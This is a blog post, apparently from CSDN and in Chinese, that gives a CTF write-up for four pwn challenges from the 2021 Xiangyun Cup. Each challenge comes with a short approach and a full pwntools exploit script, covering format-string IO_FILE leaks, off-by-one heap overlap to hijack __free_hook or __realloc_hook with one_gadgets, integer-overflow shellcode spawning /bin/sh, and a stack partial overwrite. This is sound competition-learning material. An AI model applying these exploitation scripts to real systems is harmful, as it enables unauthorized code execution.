2021祥云杯 pwn wp

最新推荐文章于 2022-10-17 09:32:43 发布
最新推荐文章于 2022-10-17 09:32:43 发布
阅读量397 收藏 2
点赞数 1
分类专栏: CTF PWN 文章标签: 系统安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39948058/article/details/119963705
版权
CTF 同时被 2 个专栏收录
32 篇文章 2 订阅
订阅专栏
PWN
29 篇文章 0 订阅
订阅专栏

 前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下

note:
思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce
exp:

#coding:utf-8
from pwn import *
context.log_level = "debug"
p = process("./note")
libc = ELF("./libc-2.23.so")
#libc=ELF('/home/roo/桌面/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6')
#p = remote("47.104.70.90",25315)
elf = ELF("./note")
 
def add(size,content):
    p.recvuntil("choice: ")
    p.sendline("1")
    p.sendlineafter("size: ",str(size))
    p.sendlineafter("content: ",content)
    p.recvuntil("addr: ")
    #heap_addr = int(p.recv(6).ljust(8,"\x00"))
 
def show():
    p.recvuntil("choice: ")
    p.sendline("3")
    p.recvuntil("content:")
    content = p.recv()
 
    
    
    
gdb.attach(p,'$rebase 0x1235')
p.recvuntil("choice: ")    
p.sendline("2")
p.recvuntil("say ? ")
p.sendline("%7$s\x00")
 
payload = p64(0xfbad1800) + p64(0)*3
p.sendline(payload)
raw_input()
 
libc_base = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00")) -0x3c36e0
malloc_hook = libc_base + libc.sym["__malloc_hook"]
success("libc_base:"+hex(libc_base))
success("malloc_hook:"+hex(malloc_hook))
rce =0x4527a + libc_base
 
realloc = libc_base + libc.sym["realloc"] 
realloc_hook = libc_base + libc.sym["__realloc_hook"]
 
 
payload = "%7$s\x00\x00\x00\x00"+p64(realloc_hook)
p.recvuntil("choice: ")
p.sendline("2")
p.recvuntil("say ? ")
p.sendline(payload)
raw_input()
#gdb.attach(p)
payload = p64(rce) + p64(realloc+6)
p.recvuntil("? ")
p.sendline(payload)
 
p.sendlineafter("choice:","1")
p.sendlineafter("size:","2")
 
p.interactive()

PassWordBox_FreeVersion:
这题难点就是没难点,当时找到一个加密发现加密这玩意不知道咋用,表现出了菜,后来一个re yeye告诉我这道题可以直接泄露,因为异或的是固定值,才知道了原来是这样,并且还有off-by-one,可以构造chunk overlap,泄露libc,打freehook为rce,即可

exp:

#coding:utf8
from pwn import *
sh = process('./pwdFree')
#sh = remote('47.104.71.220',38562)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
 
def add(index,size,content):
   sh.sendlineafter('Choice:','1')
   sh.sendlineafter('Save:',str(index))
   sh.sendlineafter('Pwd:',str(size))
   sh.sendafter('Pwd:',content)
 
def edit(index,content):
   sh.sendlineafter('Choice:','2')
   sh.sendline(str(index))
   sleep(0.5)
   sh.send(content)
 
def show(index):
   sh.sendlineafter('Choice:','3')
   sh.sendlineafter('Check:',str(index))
 
def delete(index):
   sh.sendlineafter('Choice:','4')
   sh.sendlineafter('Delete:',str(index))
 
add(0,1,'\x00')
sh.recvuntil('Save ID:')
random = u64(sh.recv(8))
print 'cookie=',hex(random)
add(1,0xF0,'a'*0xF0) #1
add(2,0x80,'b'*0x80) #2
add(3,0x80,'c'*0x80) #3
add(4,0xF0,'d'*0xF0) #4
 
for i in range(5,12):
   add(i,0xF0,'aaaa'*0xd0)
for i in range(5,12):
   delete(i)
delete(3)
 
add(3,0x88,'b'*0x80 + p64((0x100 + 0x90 + 0x90) ^ random) + '\x00')
delete(1)
delete(4)
for i in range(5,12):
   add(i,0xF0,'a'*0xf0)
add(1,0xF0,'a'*0xF0) #1
show(2)
sh.recvuntil('Pwd is: ')
libc_base = (u64(sh.recv(8)) ^ random) - 0x3ebca0
system_addr = libc_base + libc.sym['system']
free_hook_addr = libc_base + libc.sym['__free_hook']
'''
0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL
 
0x4f432 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL
 
0x10a41c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
  '''
onegdaget=0x4f432
delete(3)
add(3,0x98,'b'*0x80 + (p64(0 ^ random) + p64(0x91 ^ random) + p64(free_hook_addr ^ random)))
add(20,0x80,p64(0) + 'c'*0x78)
add(21,0x80,p64(onegdaget ^ random) + 'd'*0x78)
 
 
delete(11)
 
sh.interactive()

JigSaw'sCage :
思路:test有可执行权限,开头有长整型溢出,赋予权限,然后写shellcode。进行打即可

exp:

from pwn import *
context.log_level = 'debug'
p = process('./JigSAW')
context.arch = "amd64"
def add(idx):
    p.sendlineafter("Choice :", "1")
    p.sendlineafter("Index? :", str(idx))
def show(idx):
    p.sendlineafter("Choice :", "5")
    p.sendlineafter("Index? :", str(idx))
def edit(idx, content):
    p.sendlineafter("Choice :", "2")
    p.sendlineafter("Index? :", str(idx))
    p.sendafter("iNput:", content)
def free(idx):
    p.sendlineafter("Choice :", "3")
    p.sendlineafter("Index? :", str(idx))
def test(idx):
    p.sendlineafter("Choice :", "4")
    p.sendlineafter("Index? :", str(idx))
s1 = asm("mov rsp, rdx\nadd rsp, 0x20\npush rsp")
s2 = asm("mov rax, 0x68732f6e69622f\nadd rsp, 0x20\npush rsp")
s3 = asm("push rax\nmov rdi, rsp\nxor rsi, rsi\nadd rsp, 0x28\npush rsp")
s4 = asm("xor rdx, rdx\nmov rax, 59\nsyscall\n")
p.sendlineafter("Name:", "max")
p.sendlineafter("Choice:", str(0xffffffff+1))  #int len overlap
add(0)
add(1)
add(2)
add(3)
edit(0,s1)
edit(1, s2)
edit(2, s3)
edit(3, s4)
test(0)
p.interactive()

lemmon:
思路:这题弄麻烦拉,用secomp开到了开启沙箱,就开始想到了打srop,然后出flag,但是看到别的队有使用edit任意写name,然后再进行栈溢出,修改最后几位为栈上flag地址(这里概率很小所以成功1/2000多吧),然后free掉,通过不断的申请,申请到flag内容输出flag,,但这是最好用的方法,但是这里我采用了srop,由于版本是在libc2.26,这里申请freehook遇到了问题,只能申请到mallochook,所以这里采用了一个大胆的想法,就是在mallochook构建一个size,绕过check,再进行不断的申请即可申请到freehook,再设置freehook为setcontext,然后在freehook布置rop,赋予权限,打即可出flag

打栈地址的exp:

from pwn import *
def add(idx, name, size, msg):
    p.sendlineafter(">> ", "1")
    p.sendlineafter("emon: \n", str(idx))
    p.sendafter("emon: \n", name)
    p.sendlineafter("emon: \n", str(size))
    p.sendafter("age: \n",msg)
def edit(idx,msg):
    p.sendlineafter('>>> ','4')
    p.sendafter("Input the index of your lemon  : \n", str(idx))
    p.sendafter("Now it's your time to draw and color!\n", msg)
def free(idx):
    p.sendlineafter(">>> ", "3")
    p.sendlineafter("emon : \n", str(idx))
p=process('./lemon_pwn')
 
context.log_level = 'debug'
p.sendlineafter('me?\n','yes')
p.sendafter('number: \n','111111')
p.sendafter('first: \n','1'*0x10+p32(0x300)+'\x01')
 
p.recvuntil("0x") 
low = int(p.recv(3),16) 
print hex(low) 
 
edit(-260, "1"*0x138+p16(low+0xe000-0x40))
add(0,"A",0x500,"a")
free(0)
add(1, "\x10", 0x10, "a") 
add(0, "\x10", 0x10, "a")
add(0, "\x20", 0x500, "a")
p.interactive()

jsjsj11123
关注
专栏目录
2021长城pwn部分wp
eeeeeight的博客
09-19 6051
前言: 就, 除了vmpwn都是基础glibc的heap题 king_in_heap_1: delete函数没有把free后的指针置零, 存在uaf, 然后用unsortedbin的fd指向io结构体泄露libc, 然后mallochook上用realloc调整一下, 打onegadget就完事了 #!/usr/bin/env python # coding=utf-8 from pwn import * sh=remote('47.104.175.110',20066) #sh=process('./ki
pwn2021 祥云 (部分)
woodwhale的博客
10-07 4221
pwn2021 祥云 (部分) 前言 国庆的最后几天,一直在补题,发现祥云那个时候一道堆题都不会,直接开始补题。 补题过程中,发现自己还是太菜了,对着师傅们的wp都有些不明白.jpg 1、note 这应该是祥云里最简单的题目了QAQ。但是之前没有学过IO,参考一位师傅写的这篇博客,pwn题堆利用的一些姿势 – IO_FILE 漏洞点在于scanf的格式化字符串,可以任意位置写。发现stack中有_IO_2_1_stdout_那么,我们写入p64(0xfbad1800) + p64(0)*3来泄露
2021祥云部分pwn
weixin_46521144的博客
09-03 667
note 格式化字符串 本题考查了scanf的格式化字符串利用。一般我们用的都是printf的格式化字符串。这里是scanf 踩坑 一开始没有注意到sendline会多发一个换行符,导致往栈上$7的stdout写入的时候老是写不对,结果发现是多发了。 scanf的格式化字符利用方式和printf的比较类似,就是不能直接输出。这里注意到栈上有stdout,可以直接往里面写入绕过判断输出libc_info的fbad1800。 step1 获取libc payload1 = p64(0xfbad1800)+p6
2021 祥云 pwn-JigSaw’sCage
z1r0的博客
10-17 270
rdx是堆地址,rax是read的系统调用号,所以可以构造一个shellcode使得rdi为0,rsi为heap地址,rdx为0x1000,这样就是read(0, heap_addr, 0x1000)。v1是int,但scanf是ld,所以溢出了4个字节,这就导致了可以控制v2的值,这样只需要将v1改成0,v2改成大于14的值即可调用mprotect分配rwx权限到heap地址上。这道题属实是没有发现漏洞点在哪里,所以看了一下wm的wjh师傅的wp,发现漏洞出现下图。
2021 祥云 pwn note
yongbaoii的博客
08-30 343
保护全开 功能1 可以申请chunk,然后会给chunk地址。 功能2 功能2有一个scanf的任意写。 功能3是一个输出。 利用的就是scanf的任意写。 我们知道scanf会把我们的输入的字符串当成第一个参数,如果还有需要,会先从五个寄存器去找,然后再去找栈中的数据,那我们也去看一下寄存器或者栈上的数据有没有可以利用的。 偏移8的地方显然有一个_IO_2_1_stdout_地址,所以我们可以把他当作参数做一个任意写,劫持_IO_FILE然后泄露libc,再来一次把malloc_hook地址写上去,
祥云部分pwnwp
eeeeeight的博客
08-24 1241
lemon 主要问题是2.26版本下, 未控制好指针导致任意写 数据结构如下: lemon_name: lemon_content: 主要可利用的函数是color: 里的buf是指lemon_name结构, 所以可以控制指针lemon_addr的指向了, 因为只能用一次所以想控制整个tcache结构 其它一点可利用的函数: 开头的一次welcome: 虽然是有rand, 但无随机数种子, 所以是固定值, z3一把????! eat函数: 可以打印chunkaddr第四字节, 用于配合后面分配堆块 整
2021鹤城pwn部分wp
eeeeeight的博客
10-09 2110
littleof 白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
强网2021 pwn部分wp
eeeeeight的博客
06-18 1318
baby_diary: 本题考查2.31的off by one, 漏洞处如下: 在sub_146e中会将输入数据的ASCII码相加再相加相加…直到变成一个byte的数字, 然后加到输入数据的后一位上, 因此我们可以尝试控制输入的内容, 从而控制下一个chunk的size大小 在确定完溢出点后, 我们便开始准备伪造chunk了, 由于要满足p->fd->bk == p, p->bk->fd == p以及prevsize == size, 我们需要申请一个largebin的chunk
2021东华pwn部分wp
eeeeeight的博客
11-01 1617
前言: 除了boom都蛮简单的, 第四个pwn因为boom做的有点久就没来得及, 看了眼感觉不难也就不想花时间再做了 cpp1: 由于change时std::cin的大小没有控制好, 所以cin可以输入很多字符, 导致了堆溢出, 且申请回来的时候没有手动清空fd位, 泄露了heap偏移, 得到了tcache结构体的地址, 利用堆溢出控制free块的fd就可以控制整个tcache结构体, 从而使得unsorted bin产生. 同上, 泄露libc偏移, 再利用fd写__free_hook与system, 再
pwn2021 鹤壁 wp
woodwhale的博客
10-09 3769
pwn2021 鹤壁 wp 前言 这场比较简单,但是也看到了自己急于求成的下场,基础知识非常不牢固,很多调试手段都太拉了,逆向能力也是非常差,还是得跟着师傅们继续学啊! 1、ret2libc1 就是最简单的ret2libc1,好像还有后门,我给忘了 2、ret2libc3 也是基本的ret2libc3,puts.plt泄露puts.got从而泄露libc.address,system(“sh”) 要注意一下栈平衡,在rop之前加个ret 3、onecho 这题,虽然很简单,但是我太拉了,不会动调,导致
[2021祥云]Package Manager 2021
qq_46263951的博客
08-30 1005
一开始进入页面有点迷茫,查看了一遍也没什么发现。 查看给出的源码,在schema.js可以知道用的是mongodb。 之前也没有见过mongodb,简单了解一下MongoDB是一个基于分布式文件存储 [1] 的数据库。由C++语言编写。旨在为WEB应用提供可扩展的高性能数据存储解决方案。 在index.ts中发现存在SQL注入 router.post('/auth', async (req, res) => { let { token } = req.body; if (token !==.
Pwnwp
weixin_52553215的博客
11-22 777
如%100×10$n 表示将 0x64 写入偏移 10 处保存的指针所指向的地址(4字节),而$hn 表示写入的地址空间为 2 字节,$hhn 表示写入的地址空间为 1字节,%$lln 表示写入的地址空间为 8 字节,在 32bit 和 64bit 环境下一样。猜测 0x40060d 这个地址是个函数,运行这个函数可以直接拿到 flag,那我们只需要去不断的填充垃圾数据,然后在后面加个给的地址(也可能是不加,分情况讨论),不断尝试,直到把这个地址填充到返回地址的位置。
2021祥云部分wp
m0_51357657的博客
08-24 902
祥云2021 目前只做了两道题(没办法 tcl。。。 MISC-鸣雏恋 下载下来是个word,打开只有一句话 不太对劲,放到010里看一看发现文件头50 4B 03 04 经典压缩包了,文件后缀改成zip,解压 得到一个txt和加密压缩包,文件打开感觉什么都没有。。。 但仔细看,第二行可显示字符没有190,所以是零宽度字符隐写 vim 一下,果然 放到在线网站上解一下 压缩包解完有129488张图片,两种图片代表01,转成二进制 二进制转换成ASCII码之后,发现是个base64转png 接下
2021 祥云 pwn PassWordBox_FreeVersion
yongbaoii的博客
08-30 254
保护显然是全开。 libc给的是2.27. 进去有个这 在1309这里转一下代码 然后p创建函数,再F5过去就明明白白了 所以就是给4040这里排了个随机数。 fgets这里显然有一个off by one,或者直接可以说成是off by ...
攻防世界pwn新手题wp(通俗易懂)
njh18790816639的博客
03-10 1841
get_shell 这道题先看看附件,探查一下信息,再用ida打开,就可以发现伪代码其实很简单的: 然后在远程连接这个端口进行攻击了。 并且我们能看到它的大致防护信息,然后来个脚本: 此时就可以进行攻击了。 这样子flag就拿到了。 CGfsb 刚开始先在windows里进行一番静态调试: 大概的知道了一些漏洞,和一点信息,我们就可以进行破解了。 ...
2017湖湘pwn200的wp
一个码农的笔记
12-03 2879
湖湘pwn比赛很有趣,我做了pwns200的题目,感觉不错,我把wp分享出来,pwns的下载链接是:http://download.csdn.net/download/niexinming/10142411 把pwns100直接拖入ida中: main函数: sub_80485CD函数: 在sub_80485CD函数可以看到输入的数据直接进入了printf函数中,所以这个肯定是一
DASCTF 7月赋能赛pwn wp
N1rvana的博客
07-25 520
DASCTF 7月赋能赛pwn wp
2021祥云 CTF pwnwp
qq_39948058的博客
08-26 1219
前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下 note: 思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce exp: #coding:utf-8 from pwn import * context.log_level = "debug" p = process("./note") libc =
[祥云2021]几道简单题的wp
Huamang的博客
08-22 4335
ezyii https://xz.aliyun.com/t/9948 找yii链子打,开局就给了反序列化,看了一下是文章里面的第四条链子 exp <?php namespace Codeception\Extension{ use Faker\DefaultGenerator; use GuzzleHttp\Psr7\AppendStream; class RunProcess{ protected $output; private $proc
2023 羊城 pwn
最新发布
01-02
2023年的羊城pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出扎实的漏洞利用能力和对各种漏洞类型的深刻理解。 在比赛中,选手们将不仅需要迅速理解并攻克给定的目标程序,还要在极短的时间内快速编写出最有效的漏洞利用代码。比赛中还可能涉及到逆向工程和加密算法的挑战,综合了对系统原理和网络安全的深入理解。 对于参赛选手来说,需要具备丰富的经验和深厚的技术功底,以应对各种复杂多变的攻击场景。他们需要灵活运用各种pwn技术和工具,快速定位和利用漏洞,最大限度地获取目标系统的控制权。 羊城pwn比赛将成为一次全球顶尖网络安全专家的盛会,也将极大地推动网络安全技术的发展和创新。这场比赛将不仅展现出各选手的技术实力,也将促进国际网络安全领域的交流与合作,为推动网络安全事业的发展贡献力量。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值